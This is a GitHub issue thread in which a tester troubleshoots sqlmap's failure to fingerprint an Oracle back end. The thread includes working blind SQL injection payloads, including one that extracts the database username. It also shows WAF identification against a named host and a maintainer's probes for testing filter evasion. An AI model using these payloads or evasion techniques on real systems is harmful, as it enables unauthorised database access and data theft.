### ISSUE TITLE
Possible False Negative for "confirming back-end"

### ISSUE THREAD

**Issue by ap0l0** [sqlmapproject/sqlmap#3492]
## What’s the problem (or question)?
Currently testing an unstable application running Java and Oracle DB. SQLMap can confirm a vulnerability and I also double checked it manually using Burpsuite. The problem I am encountering is  after confirming the vulnerability. See details below:

```
GET parameter ‘DocumentNumbers’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: DocumentNumbers (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BranchCode=&DocumentNumbers=016-21297000’ AND 4296=4296 AND ‘DDPG’=’DDPG
    Vector: AND [INFERENCE]
```

The expected response from the server is a JSON text. Testing the payload manually I could replicate the vulnerability, basically if I change “4296” in the second value it will show nothing and if the values are equal, it will get the JSON file.

The next step is database confirmation, see below:

```
[23:39:47] [INFO] testing Oracle
[23:39:47] [PAYLOAD] 016-21297000’ AND LENGTH(SYSDATE)=LENGTH(SYSDATE) AND ‘MNxD’=’MNxD
[23:39:48] [INFO] confirming Oracle
[23:39:48] [PAYLOAD] 016-21297000’ AND NVL(RAWTOHEX(4975),4975)=RAWTOHEX(4975) AND ‘jJKu’=’jJKu
[23:39:50] [WARNING] the back-end DBMS is not Oracle
```
Here is when things got weird. 

[First Payload] I tested the first payload, and it worked as expected, if I change SYSDATE in one of those values it won’t show anything. If I keep the values as is then the server returns the JSON file.

[Second Payload] Apparently, in this step is where everything breaks. At first, I suspected of WAF protection but that doesn’t seem to be the case. The server returns an empty JSON response. I manually tested fake aggressive queries to test WAF but nothing happened — the application was working as usual. 

This is getting rather long — sorry. As I mentioned before, the application is kind of unstable ... occasionally it will show an error 500. Note that the "500 error" is not only when trying injection but running normal requests as well. It seems to be a bug in the web app. 

A few notes to add:

1. I used  the following: `--time-sec=15 --flush-session --delay=3`
2. I tried using tamper, same result.

Not sure how to proceed from here. Trying to continue the injection manually sounds painful. Let me know your thoughts,

Thanks.

**EDIT**: Doing some testing with new payloads things are getting weirder — see below:

Trying to retrieve the username:
`Payload: ' AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1))>64 AND 'TtOu'='TtOu&UserName=aa`

I get error 500 as a response, maybe a WAF? Well, check this out — If I remove just one of the selected comas in the following string the server will return the JSON:

Check the comas in the ,1,1 string — if I remove just one of them the server won't return 500

Payload:  AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL)**,1,1**))>64 AND 'TtOu'='TtOu&UserName=aa`

If I move the comma somewhere else, it will also show the JSON. What could that be?

**EDIT2**: It might be a WAF, a shitty one? I tried all tampers with no luck. Basically it will accept anything but ",1,1" when you add those commas with 1's then it returns 500. Not sure how to bypass it manually.

**EDIT3**: I tried to identify the WAF — no luck

```
                                    __ __
 ____  ___      ___  ____   ______ |  T  T __    __   ____  _____
l    j|   \    /  _]|    \ |      T|  |  ||  T__T  T /    T|   __|
 |  T |    \  /  [_ |  _  Yl_j  l_j|  ~  ||  |  |  |Y  o  ||  l_
 |  | |  D  YY    _]|  |  |  |  |  |___  ||  |  |  ||     ||   _|
 j  l |     ||   [_ |  |  |  |  |  |     ! \      / |  |  ||  ]
|____jl_____jl_____jl__j__j  l__j  l____/   \_/\_/  l__j__jl__j  (1.0.79)

[o] loading data...
[o] initializing handlers...
[i] checking hostname 'www.lacargo.com'...
[i] running basic heuristic test...
[x] host 'www.lacargo.com' does not seem to be protected
```

**Comment by stamparm** [comment]
This issue is not sqlmap related, but you could try to to use things like:

`...ABS(1)=1...`
`...ABS(1+1)=2...`
`...ABS(1+foobar1)=2...`
`...ABS(SELECT 1 FROM DUAL)=1...`

This all requires you to try different regular SQL function and/or formations and try to run them in slightly "broken" way. That way you'll know whether you have something to work on the other side or not. Then, that last subquery (`...SELECT 1...`) is important as most of WAFs should blink on such things
